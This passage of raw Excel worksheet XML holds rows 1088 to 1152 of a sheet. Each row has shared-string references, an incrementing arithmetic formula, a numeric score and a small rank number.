      </c>
    </row>
    <row r="1088" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1088" t="s">
        <v>2097</v>
      </c>
      <c r="B1088" t="s">
        <v>2098</v>
      </c>
      <c r="C1088">
        <f t="shared" si="16"/>
        <v>10792199</v>
      </c>
      <c r="D1088" t="s">
        <v>2099</v>
      </c>
      <c r="E1088">
        <v>21.159273147583011</v>
      </c>
      <c r="F1088">
        <v>1</v>
      </c>
    </row>
    <row r="1089" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1089" t="s">
        <v>2097</v>
      </c>
      <c r="B1089" t="s">
        <v>2098</v>
      </c>
      <c r="C1089">
        <f t="shared" si="16"/>
        <v>10793452</v>
      </c>
      <c r="D1089" t="s">
        <v>2100</v>
      </c>
      <c r="E1089">
        <v>0.26048925518989557</v>
      </c>
      <c r="F1089">
        <v>2</v>
      </c>
    </row>
    <row r="1090" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1090" t="s">
        <v>2101</v>
      </c>
      <c r="B1090" t="s">
        <v>2102</v>
      </c>
      <c r="C1090">
        <f t="shared" si="16"/>
        <v>10794705</v>
      </c>
      <c r="D1090" t="s">
        <v>2103</v>
      </c>
      <c r="E1090">
        <v>32.227466583251953</v>
      </c>
      <c r="F1090">
        <v>1</v>
      </c>
    </row>
    <row r="1091" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1091" t="s">
        <v>2101</v>
      </c>
      <c r="B1091" t="s">
        <v>2102</v>
      </c>
      <c r="C1091">
        <f t="shared" si="16"/>
        <v>10795958</v>
      </c>
      <c r="D1091" t="s">
        <v>2104</v>
      </c>
      <c r="E1091">
        <v>9.0424165725708008</v>
      </c>
      <c r="F1091">
        <v>2</v>
      </c>
    </row>
    <row r="1092" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1092" t="s">
        <v>2105</v>
      </c>
      <c r="B1092" t="s">
        <v>2106</v>
      </c>
      <c r="C1092">
        <f t="shared" si="16"/>
        <v>10797211</v>
      </c>
      <c r="D1092" t="s">
        <v>2107</v>
      </c>
      <c r="E1092">
        <v>31.465875625610352</v>
      </c>
      <c r="F1092">
        <v>1</v>
      </c>
    </row>
    <row r="1093" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1093" t="s">
        <v>2105</v>
      </c>
      <c r="B1093" t="s">
        <v>2106</v>
      </c>
      <c r="C1093">
        <f t="shared" si="16"/>
        <v>10798464</v>
      </c>
      <c r="D1093" t="s">
        <v>2108</v>
      </c>
      <c r="E1093">
        <v>12.36815166473389</v>
      </c>
      <c r="F1093">
        <v>2</v>
      </c>
    </row>
    <row r="1094" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1094" t="s">
        <v>2109</v>
      </c>
      <c r="B1094" t="s">
        <v>2110</v>
      </c>
      <c r="C1094">
        <f t="shared" si="16"/>
        <v>10799717</v>
      </c>
      <c r="D1094" t="s">
        <v>2111</v>
      </c>
      <c r="E1094">
        <v>31.511272430419918</v>
      </c>
      <c r="F1094">
        <v>1</v>
      </c>
    </row>
    <row r="1095" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1095" t="s">
        <v>2109</v>
      </c>
      <c r="B1095" t="s">
        <v>2110</v>
      </c>
      <c r="C1095">
        <f t="shared" si="16"/>
        <v>10800970</v>
      </c>
      <c r="D1095" t="s">
        <v>2112</v>
      </c>
      <c r="E1095">
        <v>3.1455307006835942</v>
      </c>
      <c r="F1095">
        <v>2</v>
      </c>
    </row>
    <row r="1096" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1096" t="s">
        <v>2113</v>
      </c>
      <c r="B1096" t="s">
        <v>2058</v>
      </c>
      <c r="C1096">
        <f t="shared" si="16"/>
        <v>10802223</v>
      </c>
      <c r="D1096" t="s">
        <v>2059</v>
      </c>
      <c r="E1096">
        <v>28.634452819824219</v>
      </c>
      <c r="F1096">
        <v>1</v>
      </c>
    </row>
    <row r="1097" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1097" t="s">
        <v>2113</v>
      </c>
      <c r="B1097" t="s">
        <v>2058</v>
      </c>
      <c r="C1097">
        <f t="shared" si="16"/>
        <v>10803476</v>
      </c>
      <c r="D1097" t="s">
        <v>2114</v>
      </c>
      <c r="E1097">
        <v>4.2573350947350258E-4</v>
      </c>
      <c r="F1097">
        <v>2</v>
      </c>
    </row>
    <row r="1098" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1098" t="s">
        <v>2115</v>
      </c>
      <c r="B1098" t="s">
        <v>2116</v>
      </c>
      <c r="C1098">
        <f t="shared" ref="C1098:C1161" si="17">C1097+1253</f>
        <v>10804729</v>
      </c>
      <c r="D1098" t="s">
        <v>2117</v>
      </c>
      <c r="E1098">
        <v>26.995378494262699</v>
      </c>
      <c r="F1098">
        <v>1</v>
      </c>
    </row>
    <row r="1099" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1099" t="s">
        <v>2115</v>
      </c>
      <c r="B1099" t="s">
        <v>2116</v>
      </c>
      <c r="C1099">
        <f t="shared" si="17"/>
        <v>10805982</v>
      </c>
      <c r="D1099" t="s">
        <v>2118</v>
      </c>
      <c r="E1099">
        <v>15.979146003723139</v>
      </c>
      <c r="F1099">
        <v>2</v>
      </c>
    </row>
    <row r="1100" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1100" t="s">
        <v>2119</v>
      </c>
      <c r="B1100" t="s">
        <v>2120</v>
      </c>
      <c r="C1100">
        <f t="shared" si="17"/>
        <v>10807235</v>
      </c>
      <c r="D1100" t="s">
        <v>2121</v>
      </c>
      <c r="E1100">
        <v>26.9400634765625</v>
      </c>
      <c r="F1100">
        <v>1</v>
      </c>
    </row>
    <row r="1101" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1101" t="s">
        <v>2119</v>
      </c>
      <c r="B1101" t="s">
        <v>2120</v>
      </c>
      <c r="C1101">
        <f t="shared" si="17"/>
        <v>10808488</v>
      </c>
      <c r="D1101" t="s">
        <v>2122</v>
      </c>
      <c r="E1101">
        <v>12.32791328430176</v>
      </c>
      <c r="F1101">
        <v>2</v>
      </c>
    </row>
    <row r="1102" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1102" t="s">
        <v>2123</v>
      </c>
      <c r="B1102" t="s">
        <v>2124</v>
      </c>
      <c r="C1102">
        <f t="shared" si="17"/>
        <v>10809741</v>
      </c>
      <c r="D1102" t="s">
        <v>2125</v>
      </c>
      <c r="E1102">
        <v>12.72247219085693</v>
      </c>
      <c r="F1102">
        <v>1</v>
      </c>
    </row>
    <row r="1103" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1103" t="s">
        <v>2123</v>
      </c>
      <c r="B1103" t="s">
        <v>2124</v>
      </c>
      <c r="C1103">
        <f t="shared" si="17"/>
        <v>10810994</v>
      </c>
      <c r="D1103" t="s">
        <v>2126</v>
      </c>
      <c r="E1103">
        <v>3.7183330059051509</v>
      </c>
      <c r="F1103">
        <v>2</v>
      </c>
    </row>
    <row r="1104" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1104" t="s">
        <v>2127</v>
      </c>
      <c r="B1104" t="s">
        <v>2128</v>
      </c>
      <c r="C1104">
        <f t="shared" si="17"/>
        <v>10812247</v>
      </c>
      <c r="D1104" t="s">
        <v>2129</v>
      </c>
      <c r="E1104">
        <v>21.675079345703121</v>
      </c>
      <c r="F1104">
        <v>1</v>
      </c>
    </row>
    <row r="1105" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1105" t="s">
        <v>2127</v>
      </c>
      <c r="B1105" t="s">
        <v>2128</v>
      </c>
      <c r="C1105">
        <f t="shared" si="17"/>
        <v>10813500</v>
      </c>
      <c r="D1105" t="s">
        <v>2130</v>
      </c>
      <c r="E1105">
        <v>12.059505462646481</v>
      </c>
      <c r="F1105">
        <v>2</v>
      </c>
    </row>
    <row r="1106" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1106" t="s">
        <v>2131</v>
      </c>
      <c r="B1106" t="s">
        <v>2132</v>
      </c>
      <c r="C1106">
        <f t="shared" si="17"/>
        <v>10814753</v>
      </c>
      <c r="D1106" t="s">
        <v>2133</v>
      </c>
      <c r="E1106">
        <v>26.5269660949707</v>
      </c>
      <c r="F1106">
        <v>1</v>
      </c>
    </row>
    <row r="1107" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1107" t="s">
        <v>2131</v>
      </c>
      <c r="B1107" t="s">
        <v>2132</v>
      </c>
      <c r="C1107">
        <f t="shared" si="17"/>
        <v>10816006</v>
      </c>
      <c r="D1107" t="s">
        <v>2134</v>
      </c>
      <c r="E1107">
        <v>7.4397215843200684</v>
      </c>
      <c r="F1107">
        <v>2</v>
      </c>
    </row>
    <row r="1108" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1108" t="s">
        <v>2135</v>
      </c>
      <c r="B1108" t="s">
        <v>1999</v>
      </c>
      <c r="C1108">
        <f t="shared" si="17"/>
        <v>10817259</v>
      </c>
      <c r="D1108" t="s">
        <v>2000</v>
      </c>
      <c r="E1108">
        <v>31.717288970947269</v>
      </c>
      <c r="F1108">
        <v>1</v>
      </c>
    </row>
    <row r="1109" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1109" t="s">
        <v>2135</v>
      </c>
      <c r="B1109" t="s">
        <v>1999</v>
      </c>
      <c r="C1109">
        <f t="shared" si="17"/>
        <v>10818512</v>
      </c>
      <c r="D1109" t="s">
        <v>2136</v>
      </c>
      <c r="E1109">
        <v>0.31025642156600952</v>
      </c>
      <c r="F1109">
        <v>2</v>
      </c>
    </row>
    <row r="1110" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1110" t="s">
        <v>2137</v>
      </c>
      <c r="B1110" t="s">
        <v>2138</v>
      </c>
      <c r="C1110">
        <f t="shared" si="17"/>
        <v>10819765</v>
      </c>
      <c r="D1110" t="s">
        <v>2139</v>
      </c>
      <c r="E1110">
        <v>33.495407104492188</v>
      </c>
      <c r="F1110">
        <v>1</v>
      </c>
    </row>
    <row r="1111" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1111" t="s">
        <v>2137</v>
      </c>
      <c r="B1111" t="s">
        <v>2138</v>
      </c>
      <c r="C1111">
        <f t="shared" si="17"/>
        <v>10821018</v>
      </c>
      <c r="D1111" t="s">
        <v>2140</v>
      </c>
      <c r="E1111">
        <v>0.1145343035459518</v>
      </c>
      <c r="F1111">
        <v>2</v>
      </c>
    </row>
    <row r="1112" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1112" t="s">
        <v>2141</v>
      </c>
      <c r="B1112" t="s">
        <v>2142</v>
      </c>
      <c r="C1112">
        <f t="shared" si="17"/>
        <v>10822271</v>
      </c>
      <c r="D1112" t="s">
        <v>2143</v>
      </c>
      <c r="E1112">
        <v>27.66530799865723</v>
      </c>
      <c r="F1112">
        <v>1</v>
      </c>
    </row>
    <row r="1113" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1113" t="s">
        <v>2141</v>
      </c>
      <c r="B1113" t="s">
        <v>2142</v>
      </c>
      <c r="C1113">
        <f t="shared" si="17"/>
        <v>10823524</v>
      </c>
      <c r="D1113" t="s">
        <v>2144</v>
      </c>
      <c r="E1113">
        <v>0.56746941804885864</v>
      </c>
      <c r="F1113">
        <v>2</v>
      </c>
    </row>
    <row r="1114" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1114" t="s">
        <v>2145</v>
      </c>
      <c r="B1114" t="s">
        <v>2146</v>
      </c>
      <c r="C1114">
        <f t="shared" si="17"/>
        <v>10824777</v>
      </c>
      <c r="D1114" t="s">
        <v>2147</v>
      </c>
      <c r="E1114">
        <v>31.016618728637699</v>
      </c>
      <c r="F1114">
        <v>1</v>
      </c>
    </row>
    <row r="1115" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1115" t="s">
        <v>2145</v>
      </c>
      <c r="B1115" t="s">
        <v>2146</v>
      </c>
      <c r="C1115">
        <f t="shared" si="17"/>
        <v>10826030</v>
      </c>
      <c r="D1115" t="s">
        <v>2148</v>
      </c>
      <c r="E1115">
        <v>4.1261043548583984</v>
      </c>
      <c r="F1115">
        <v>2</v>
      </c>
    </row>
    <row r="1116" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1116" t="s">
        <v>2149</v>
      </c>
      <c r="B1116" t="s">
        <v>2150</v>
      </c>
      <c r="C1116">
        <f t="shared" si="17"/>
        <v>10827283</v>
      </c>
      <c r="D1116" t="s">
        <v>2151</v>
      </c>
      <c r="E1116">
        <v>27.911275863647461</v>
      </c>
      <c r="F1116">
        <v>1</v>
      </c>
    </row>
    <row r="1117" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1117" t="s">
        <v>2149</v>
      </c>
      <c r="B1117" t="s">
        <v>2150</v>
      </c>
      <c r="C1117">
        <f t="shared" si="17"/>
        <v>10828536</v>
      </c>
      <c r="D1117" t="s">
        <v>2152</v>
      </c>
      <c r="E1117">
        <v>3.4449238330125809E-2</v>
      </c>
      <c r="F1117">
        <v>2</v>
      </c>
    </row>
    <row r="1118" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1118" t="s">
        <v>2153</v>
      </c>
      <c r="B1118" t="s">
        <v>2154</v>
      </c>
      <c r="C1118">
        <f t="shared" si="17"/>
        <v>10829789</v>
      </c>
      <c r="D1118" t="s">
        <v>2155</v>
      </c>
      <c r="E1118">
        <v>24.32411003112793</v>
      </c>
      <c r="F1118">
        <v>1</v>
      </c>
    </row>
    <row r="1119" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1119" t="s">
        <v>2153</v>
      </c>
      <c r="B1119" t="s">
        <v>2154</v>
      </c>
      <c r="C1119">
        <f t="shared" si="17"/>
        <v>10831042</v>
      </c>
      <c r="D1119" t="s">
        <v>2156</v>
      </c>
      <c r="E1119">
        <v>11.24964046478271</v>
      </c>
      <c r="F1119">
        <v>2</v>
      </c>
    </row>
    <row r="1120" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1120" t="s">
        <v>2157</v>
      </c>
      <c r="B1120" t="s">
        <v>2158</v>
      </c>
      <c r="C1120">
        <f t="shared" si="17"/>
        <v>10832295</v>
      </c>
      <c r="D1120" t="s">
        <v>2159</v>
      </c>
      <c r="E1120">
        <v>40.032341003417969</v>
      </c>
      <c r="F1120">
        <v>1</v>
      </c>
    </row>
    <row r="1121" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1121" t="s">
        <v>2157</v>
      </c>
      <c r="B1121" t="s">
        <v>2158</v>
      </c>
      <c r="C1121">
        <f t="shared" si="17"/>
        <v>10833548</v>
      </c>
      <c r="D1121" t="s">
        <v>2160</v>
      </c>
      <c r="E1121">
        <v>38.392169952392578</v>
      </c>
      <c r="F1121">
        <v>2</v>
      </c>
    </row>
    <row r="1122" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1122" t="s">
        <v>2157</v>
      </c>
      <c r="B1122" t="s">
        <v>2158</v>
      </c>
      <c r="C1122">
        <f t="shared" si="17"/>
        <v>10834801</v>
      </c>
      <c r="D1122" t="s">
        <v>2161</v>
      </c>
      <c r="E1122">
        <v>34.224044799804688</v>
      </c>
      <c r="F1122">
        <v>3</v>
      </c>
    </row>
    <row r="1123" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1123" t="s">
        <v>2157</v>
      </c>
      <c r="B1123" t="s">
        <v>2158</v>
      </c>
      <c r="C1123">
        <f t="shared" si="17"/>
        <v>10836054</v>
      </c>
      <c r="D1123" t="s">
        <v>2161</v>
      </c>
      <c r="E1123">
        <v>34.224044799804688</v>
      </c>
      <c r="F1123">
        <v>4</v>
      </c>
    </row>
    <row r="1124" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1124" t="s">
        <v>2157</v>
      </c>
      <c r="B1124" t="s">
        <v>2158</v>
      </c>
      <c r="C1124">
        <f t="shared" si="17"/>
        <v>10837307</v>
      </c>
      <c r="D1124" t="s">
        <v>2162</v>
      </c>
      <c r="E1124">
        <v>33.298213958740227</v>
      </c>
      <c r="F1124">
        <v>5</v>
      </c>
    </row>
    <row r="1125" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1125" t="s">
        <v>2157</v>
      </c>
      <c r="B1125" t="s">
        <v>2158</v>
      </c>
      <c r="C1125">
        <f t="shared" si="17"/>
        <v>10838560</v>
      </c>
      <c r="D1125" t="s">
        <v>2162</v>
      </c>
      <c r="E1125">
        <v>33.298213958740227</v>
      </c>
      <c r="F1125">
        <v>6</v>
      </c>
    </row>
    <row r="1126" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1126" t="s">
        <v>2157</v>
      </c>
      <c r="B1126" t="s">
        <v>2158</v>
      </c>
      <c r="C1126">
        <f t="shared" si="17"/>
        <v>10839813</v>
      </c>
      <c r="D1126" t="s">
        <v>2163</v>
      </c>
      <c r="E1126">
        <v>30.405448913574219</v>
      </c>
      <c r="F1126">
        <v>7</v>
      </c>
    </row>
    <row r="1127" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1127" t="s">
        <v>2157</v>
      </c>
      <c r="B1127" t="s">
        <v>2158</v>
      </c>
      <c r="C1127">
        <f t="shared" si="17"/>
        <v>10841066</v>
      </c>
      <c r="D1127" t="s">
        <v>2164</v>
      </c>
      <c r="E1127">
        <v>29.707660675048832</v>
      </c>
      <c r="F1127">
        <v>8</v>
      </c>
    </row>
    <row r="1128" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1128" t="s">
        <v>2157</v>
      </c>
      <c r="B1128" t="s">
        <v>2158</v>
      </c>
      <c r="C1128">
        <f t="shared" si="17"/>
        <v>10842319</v>
      </c>
      <c r="D1128" t="s">
        <v>2165</v>
      </c>
      <c r="E1128">
        <v>28.434904098510739</v>
      </c>
      <c r="F1128">
        <v>9</v>
      </c>
    </row>
    <row r="1129" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1129" t="s">
        <v>2157</v>
      </c>
      <c r="B1129" t="s">
        <v>2158</v>
      </c>
      <c r="C1129">
        <f t="shared" si="17"/>
        <v>10843572</v>
      </c>
      <c r="D1129" t="s">
        <v>2166</v>
      </c>
      <c r="E1129">
        <v>28.350263595581051</v>
      </c>
      <c r="F1129">
        <v>10</v>
      </c>
    </row>
    <row r="1130" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1130" t="s">
        <v>2157</v>
      </c>
      <c r="B1130" t="s">
        <v>2158</v>
      </c>
      <c r="C1130">
        <f t="shared" si="17"/>
        <v>10844825</v>
      </c>
      <c r="D1130" t="s">
        <v>2167</v>
      </c>
      <c r="E1130">
        <v>23.098114013671879</v>
      </c>
      <c r="F1130">
        <v>11</v>
      </c>
    </row>
    <row r="1131" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1131" t="s">
        <v>2157</v>
      </c>
      <c r="B1131" t="s">
        <v>2158</v>
      </c>
      <c r="C1131">
        <f t="shared" si="17"/>
        <v>10846078</v>
      </c>
      <c r="D1131" t="s">
        <v>2168</v>
      </c>
      <c r="E1131">
        <v>20.349992752075199</v>
      </c>
      <c r="F1131">
        <v>12</v>
      </c>
    </row>
    <row r="1132" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1132" t="s">
        <v>2157</v>
      </c>
      <c r="B1132" t="s">
        <v>2158</v>
      </c>
      <c r="C1132">
        <f t="shared" si="17"/>
        <v>10847331</v>
      </c>
      <c r="D1132" t="s">
        <v>2168</v>
      </c>
      <c r="E1132">
        <v>20.349992752075199</v>
      </c>
      <c r="F1132">
        <v>13</v>
      </c>
    </row>
    <row r="1133" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1133" t="s">
        <v>2157</v>
      </c>
      <c r="B1133" t="s">
        <v>2158</v>
      </c>
      <c r="C1133">
        <f t="shared" si="17"/>
        <v>10848584</v>
      </c>
      <c r="D1133" t="s">
        <v>2169</v>
      </c>
      <c r="E1133">
        <v>7.3131141252815723E-3</v>
      </c>
      <c r="F1133">
        <v>14</v>
      </c>
    </row>
    <row r="1134" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1134" t="s">
        <v>2170</v>
      </c>
      <c r="B1134" t="s">
        <v>2171</v>
      </c>
      <c r="C1134">
        <f t="shared" si="17"/>
        <v>10849837</v>
      </c>
      <c r="D1134" t="s">
        <v>2172</v>
      </c>
      <c r="E1134">
        <v>27.444961547851559</v>
      </c>
      <c r="F1134">
        <v>1</v>
      </c>
    </row>
    <row r="1135" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1135" t="s">
        <v>2170</v>
      </c>
      <c r="B1135" t="s">
        <v>2171</v>
      </c>
      <c r="C1135">
        <f t="shared" si="17"/>
        <v>10851090</v>
      </c>
      <c r="D1135" t="s">
        <v>2173</v>
      </c>
      <c r="E1135">
        <v>2.3547883033752441</v>
      </c>
      <c r="F1135">
        <v>2</v>
      </c>
    </row>
    <row r="1136" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1136" t="s">
        <v>2174</v>
      </c>
      <c r="B1136" t="s">
        <v>2175</v>
      </c>
      <c r="C1136">
        <f t="shared" si="17"/>
        <v>10852343</v>
      </c>
      <c r="D1136" t="s">
        <v>2176</v>
      </c>
      <c r="E1136">
        <v>30.22578048706055</v>
      </c>
      <c r="F1136">
        <v>1</v>
      </c>
    </row>
    <row r="1137" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1137" t="s">
        <v>2174</v>
      </c>
      <c r="B1137" t="s">
        <v>2175</v>
      </c>
      <c r="C1137">
        <f t="shared" si="17"/>
        <v>10853596</v>
      </c>
      <c r="D1137" t="s">
        <v>2177</v>
      </c>
      <c r="E1137">
        <v>7.2440199851989746</v>
      </c>
      <c r="F1137">
        <v>2</v>
      </c>
    </row>
    <row r="1138" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1138" t="s">
        <v>2178</v>
      </c>
      <c r="B1138" t="s">
        <v>2179</v>
      </c>
      <c r="C1138">
        <f t="shared" si="17"/>
        <v>10854849</v>
      </c>
      <c r="D1138" t="s">
        <v>2180</v>
      </c>
      <c r="E1138">
        <v>27.690128326416019</v>
      </c>
      <c r="F1138">
        <v>1</v>
      </c>
    </row>
    <row r="1139" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1139" t="s">
        <v>2178</v>
      </c>
      <c r="B1139" t="s">
        <v>2179</v>
      </c>
      <c r="C1139">
        <f t="shared" si="17"/>
        <v>10856102</v>
      </c>
      <c r="D1139" t="s">
        <v>2181</v>
      </c>
      <c r="E1139">
        <v>11.548531532287599</v>
      </c>
      <c r="F1139">
        <v>2</v>
      </c>
    </row>
    <row r="1140" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1140" t="s">
        <v>2182</v>
      </c>
      <c r="B1140" t="s">
        <v>2183</v>
      </c>
      <c r="C1140">
        <f t="shared" si="17"/>
        <v>10857355</v>
      </c>
      <c r="D1140" t="s">
        <v>2184</v>
      </c>
      <c r="E1140">
        <v>34.075122833251953</v>
      </c>
      <c r="F1140">
        <v>1</v>
      </c>
    </row>
    <row r="1141" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1141" t="s">
        <v>2182</v>
      </c>
      <c r="B1141" t="s">
        <v>2183</v>
      </c>
      <c r="C1141">
        <f t="shared" si="17"/>
        <v>10858608</v>
      </c>
      <c r="D1141" t="s">
        <v>2185</v>
      </c>
      <c r="E1141">
        <v>6.254692554473877</v>
      </c>
      <c r="F1141">
        <v>2</v>
      </c>
    </row>
    <row r="1142" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1142" t="s">
        <v>2186</v>
      </c>
      <c r="B1142" t="s">
        <v>2187</v>
      </c>
      <c r="C1142">
        <f t="shared" si="17"/>
        <v>10859861</v>
      </c>
      <c r="D1142" t="s">
        <v>2188</v>
      </c>
      <c r="E1142">
        <v>23.37476921081543</v>
      </c>
      <c r="F1142">
        <v>1</v>
      </c>
    </row>
    <row r="1143" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1143" t="s">
        <v>2186</v>
      </c>
      <c r="B1143" t="s">
        <v>2187</v>
      </c>
      <c r="C1143">
        <f t="shared" si="17"/>
        <v>10861114</v>
      </c>
      <c r="D1143" t="s">
        <v>2189</v>
      </c>
      <c r="E1143">
        <v>11.578447341918951</v>
      </c>
      <c r="F1143">
        <v>2</v>
      </c>
    </row>
    <row r="1144" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1144" t="s">
        <v>2190</v>
      </c>
      <c r="B1144" t="s">
        <v>2191</v>
      </c>
      <c r="C1144">
        <f t="shared" si="17"/>
        <v>10862367</v>
      </c>
      <c r="D1144" t="s">
        <v>2192</v>
      </c>
      <c r="E1144">
        <v>26.949375152587891</v>
      </c>
      <c r="F1144">
        <v>1</v>
      </c>
    </row>
    <row r="1145" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1145" t="s">
        <v>2190</v>
      </c>
      <c r="B1145" t="s">
        <v>2191</v>
      </c>
      <c r="C1145">
        <f t="shared" si="17"/>
        <v>10863620</v>
      </c>
      <c r="D1145" t="s">
        <v>2193</v>
      </c>
      <c r="E1145">
        <v>3.5579087734222412</v>
      </c>
      <c r="F1145">
        <v>2</v>
      </c>
    </row>
    <row r="1146" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1146" t="s">
        <v>2194</v>
      </c>
      <c r="B1146" t="s">
        <v>2195</v>
      </c>
      <c r="C1146">
        <f t="shared" si="17"/>
        <v>10864873</v>
      </c>
      <c r="D1146" t="s">
        <v>2196</v>
      </c>
      <c r="E1146">
        <v>30.42161750793457</v>
      </c>
      <c r="F1146">
        <v>1</v>
      </c>
    </row>
    <row r="1147" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1147" t="s">
        <v>2194</v>
      </c>
      <c r="B1147" t="s">
        <v>2195</v>
      </c>
      <c r="C1147">
        <f t="shared" si="17"/>
        <v>10866126</v>
      </c>
      <c r="D1147" t="s">
        <v>2197</v>
      </c>
      <c r="E1147">
        <v>10.267734527587891</v>
      </c>
      <c r="F1147">
        <v>2</v>
      </c>
    </row>
    <row r="1148" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1148" t="s">
        <v>2198</v>
      </c>
      <c r="B1148" t="s">
        <v>2199</v>
      </c>
      <c r="C1148">
        <f t="shared" si="17"/>
        <v>10867379</v>
      </c>
      <c r="D1148" t="s">
        <v>2200</v>
      </c>
      <c r="E1148">
        <v>22.207004547119141</v>
      </c>
      <c r="F1148">
        <v>1</v>
      </c>
    </row>
    <row r="1149" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1149" t="s">
        <v>2198</v>
      </c>
      <c r="B1149" t="s">
        <v>2199</v>
      </c>
      <c r="C1149">
        <f t="shared" si="17"/>
        <v>10868632</v>
      </c>
      <c r="D1149" t="s">
        <v>2201</v>
      </c>
      <c r="E1149">
        <v>10.873814582824711</v>
      </c>
      <c r="F1149">
        <v>2</v>
      </c>
    </row>
    <row r="1150" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1150" t="s">
        <v>2202</v>
      </c>
      <c r="B1150" t="s">
        <v>2203</v>
      </c>
      <c r="C1150">
        <f t="shared" si="17"/>
        <v>10869885</v>
      </c>
      <c r="D1150" t="s">
        <v>266</v>
      </c>
      <c r="E1150">
        <v>30.499223709106449</v>
      </c>
      <c r="F1150">
        <v>1</v>
      </c>
    </row>
    <row r="1151" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1151" t="s">
        <v>2202</v>
      </c>
      <c r="B1151" t="s">
        <v>2203</v>
      </c>
      <c r="C1151">
        <f t="shared" si="17"/>
        <v>10871138</v>
      </c>
      <c r="D1151" t="s">
        <v>2204</v>
      </c>
      <c r="E1151">
        <v>6.3482718467712402</v>
      </c>
      <c r="F1151">
        <v>2</v>
      </c>
    </row>
    <row r="1152" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1152" t="s">
        <v>2205</v>
      </c>
      <c r="B1152" t="s">
        <v>2206</v>
      </c>
      <c r="C1152">
        <f t="shared" si="17"/>
        <v>10872391</v>
      </c>
      <c r="D1152" t="s">
        <v>2207</v>
      </c>
      <c r="E1152">
        <v>31.156011581420898</v>
      </c>
      <c r="F1152">
        <v>1</v>
      </c>
